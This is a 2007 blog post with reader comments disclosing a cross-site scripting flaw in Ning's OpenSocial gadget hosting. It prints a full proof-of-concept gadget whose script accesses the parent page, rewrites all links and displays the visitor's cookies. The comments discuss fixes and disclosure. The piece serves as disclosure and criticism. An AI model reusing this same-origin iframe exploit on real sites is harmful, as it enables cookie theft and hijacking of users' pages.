Peer Prescience
Posted by harold at November 3rd, 2007
Friends. Romans. People with half a brain. It’s finally happened: Google’s opened the floodgates to ubiquitous bad taste, annoyances, and exploits across all social networking platforms, ranging from Ning to MySpace to the Iranian Goat Farmers’ Association. If you’ve been following the tech news lately, you’re probably aware that Google and his merry band of transvestites released the abomination known as the OpenSocial API this past Thursday. I understand that sounds like a pretty rash statement—I do get a rash some times—but this time I’m going to back it up with the facts and let you decide, doc.
It all started with a neat little trinket known as Google Gadgets. If you’re the sort of person who doesn’t give a damn about personal privacy, I’m sure you’ve used iGoogle, which allows you to put all kinds of nice little gadgets on your Google home page. Ok, even I use it—it’s just way too handy being able to check the weather and gas prices without even stepping outside! But you know, then I got hacking, and things didn’t look so hot anymore… any gadget that you add can run arbitrary javascript in your browser, and if you create a gadget using the “html-inline” content mode, it can even radically alter the structure of the iGoogle home page! So I tried that, and boy was I relieved when it gave me an extra little warning that I brashly clicked through to get my widget onto my home page… but hey, whatever I put on my iGoogle is my fault. It’s my customization.
On the other hand, social networks—at least amongst the non-retard/myspace set—very wisely have thus far constrained the format of peoples’ profiles. You get maybe a picture, some work history, and some stupid little details about how the person’s a big loser that nobody cares about. Maybe some trite comments from so-called “friends.” But with OpenSocial…? Perhaps you should take a look at my niece’s handiwork. Sorry, she’s not that stupid, I actually made that page myself (got you back, Berli!). Anyway, you see that little box o’ seizures titled “preaty culrz!”? It’s a Google Gadget in full glory.
But it gets worse than that, friends. That little Google Gadget could actually be a lot nastier than it looks, because it’s an “html-inline” component… when I add it on iGoogle, it makes my whole page background nauseatingly flashy. Ning is actually shielding your eyes by ignoring the fact that it’s an “html-inline” component—and forcing the box o’ seizures to be rendered in an iframe. But wait a minute. Where’s that iframe being loaded from?? Let’s take a gander at the source to Berlinetta’s page:
<iframe id="embeddingFrame" ... src="/gadgets/index/gadgetWrapper?url=http%3A%2F%2Fhosting.gmodules.com%2Fig%2Fgadgets%2Ffile%2F107691354973556300155%2Fsplendid.xml&ownerName=18wefqtay110x&mode=profile"> </iframe>
Splendid! If you view the source of gadgetWrapper with the url argument, you’ll notice that the code of the Gadget is inserted into the gadgetWrapper page on the server side. Those Web 2.0 wizards just left the front gates unlocked and well-oiled, ready to be swung right open. Now what if, purely hypothetically, one of Berlinetta’s puckish little friends happened to oh, push the gate open and walk in? But we don’t have to wonder, we can know.
Yes dudes, that’s right: that innocent looking little gadget purportedly describing a delicious extract of mulberry actually extracts your delicious cookies and rewrites all of the hyperlinks on the page. I could have been more devious about it, but remember, my goal here is merely exposition of how much Web 2.0 sucks. In case you missed it, here’s the link to the page with the exploit, and here’s the exploitive little gadget itself:
<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="Splendid!" />
<Content type="html"><![CDATA[
<script language="javascript">
function exploit() {
var doc = window.top.document;
var a = doc.getElementsByTagName('a');
for (var i = 0; i < a.length; i++) {
if (a[i].hasAttribute('href')) {
a[i].setAttribute('href',
'http://www.haroldtherebel.com/2007/11/03/peer-prescience/');
}
}
document.getElementById('done').innerHTML
= document.cookie;
}
</script>
<font color="#ffffff"><form>
<center>Click this button to make all of the links
on this page go to haroldtherebel.com:<br/>
<input type="button" onclick="exploit();"
value="Exploit now!"><br/>
cook-ease:<br/>
<textarea id="done" rows="10" cols="60"></textarea></center>
</form></font>
]]></Content>
</Module>
The exploit really stands for itself, but let me point out the magic line: “var doc = window.top.document;” This says “yeah, I know I’m a measly little iframe, but just forget that and give me access to the whole document.” If the iframe comes from the same server as the main page, your browser is more than happy to honor that request. Hence the gate swings open. The floodgates of antisocial behavior, opened courtesy of OpenSocial. Good job Ning, Google, and everybody else! Rah-rah Web 2.0! Cross-site scripting makes you strong and healthy like a beluga whale!
Yeah, I’m sure that stuff is worth billions. Sorry, I’d put my money on a factory full of slave laborors making tennis shoes in south-east Asia anyday.
Woah, gotta hand it to ya Harold–you’re more deserving of the name haxz0r_mstr than I am right now. Well done!
haxz0r_mstr
You’ve gone and done it this time Harold. You are now endangering the livelihoods of millions just for the sake of your personal vendetta against Web 2.0. I don’t understand why you dislike it so much you antisocial recluse. And what was that about insulting your niece? You unkind and undeserving man!
And by the way, haxz0r_mstr, I have nothing to say to you until you stop being so lame and get a real name.
Erny Watson
FP!!
franc.perkinz@csfb.com
man i saw your article linkd off reddit and like woah that is one major major security hole. i’m gonna go delete all my social networking accounts now
albert mendez
A FLAW IN WEB 2.0 OH SHI- STOP THE PRESSES THIS IS BIG FUCKING NEWS!
0x20
Most of the people who comment here suck!
Wonder what the official response to these type of exploits will be?
the only thing you didn’t really consider I guess is that the server has a chance to intercept the document - so it wouldn’t be to hard to strip anything that refers to the parent document…
Henry
Henry
hey, where did you come from? great writing style, cool attitude, dang, i am going to have to keep checking back… enjoy, gregory
gregory
sorry, a second reply, but you might be the right person to ask….
doesn’t it seem like the sole purpose of web 2.0 is to collect as much data as possible on as many people as possible in the shortest amount of time? big brother with a relentless gleam in the eye, saliva forming, teeth gnashing?
and doesn’t it seem like microsoft and google long ago cut deals with the justice department, and have left back doors open for the feds?
i feel a bit foolish every time i am asked to register for some sort of new webby thing, because i just hit the x up in the right hand corner, but….
i don’t feel i am paranoid, it just intuitively feels like that is what is happening, which is ok, because humans are on the way to omniscience anyway, but still…..
gregory
It is up to the service hosting this container (Ning in this case) to sniff out bad code. Maybe they will start by blocking gadgets containing methods named exploit and linkspam_this_page_and_befriend_me
Even that is a lot of work for this gadgetWrapper proxy to do!
Welcome to the child of the browser wars.
Jamie Pitts
Great comments, boys! Some points:
Henry and Jamie: I agree, the server has an opportunity to intercept the gadget code. But how is it going to fully scrub the code? The dynamic semantics of Javascript make it hard enough, and then there’s the fact that different browsers implement JS and the DOM differently. It’s always a game of cat and mouse trying to patch up malicious code! What would have made more sense from a security standpoint is a fully-defined gadget language which is strictly checked and then translated to Javascript. But boo-hoo, then you can’t take advantage of all those fancy new Web 2.0 features that just got hacked into your favorite browser until the server updates its support!
Gregory: I totally agree that Web 2.0 is about creating and holding onto customer relationships, regardless of whether the customer’s interested. Being old and jaded, I’m more inclined to say that the feds don’t have much to do with instituting all the tracking, though they’ll definitely make use of the data when they can. It just so happens that advertisers and authoritarians are looking for the same thing: to predict and influence consumer behavior. And because Web 2.0 provides trivial to no value to the consumer, they can’t sell service to the consumer… so instead we, as site visitors are sold as cattle to the highest bidder (which is usually pretty low!)
I’m going to be posting more along these lines, including some possible ways out of this mess in the future. I don’t have a set blogging schedule, but a post once a week sounds about right.
harold
Looks like it’s fixed, at least in FireFox 2. Clicking the button throws:
uncaught exception: Permission denied to get property HTMLDocument.getElementsByTagName
in the firebug console.
I’m sure Ning will thank you for consulting for them for free…
brian rue
Dude http://www.wiretrip.net/rfp/policy.html ‘nough said.
Robert
presumably Ning changed the src attribute in the iframe to point to a different top level domain than the iframe containing the exploit. That’s all they really needed to do to fix the issue. You should never allow user active content in an iframe at the same top level domain as parent, anyway. Ning should have known better.
Mr. Drano
Very useful files search engine. http://indexoffiles.com/?q=windows xp is a search engine designed to search files in various file sharing and uploading sites.
Facepalm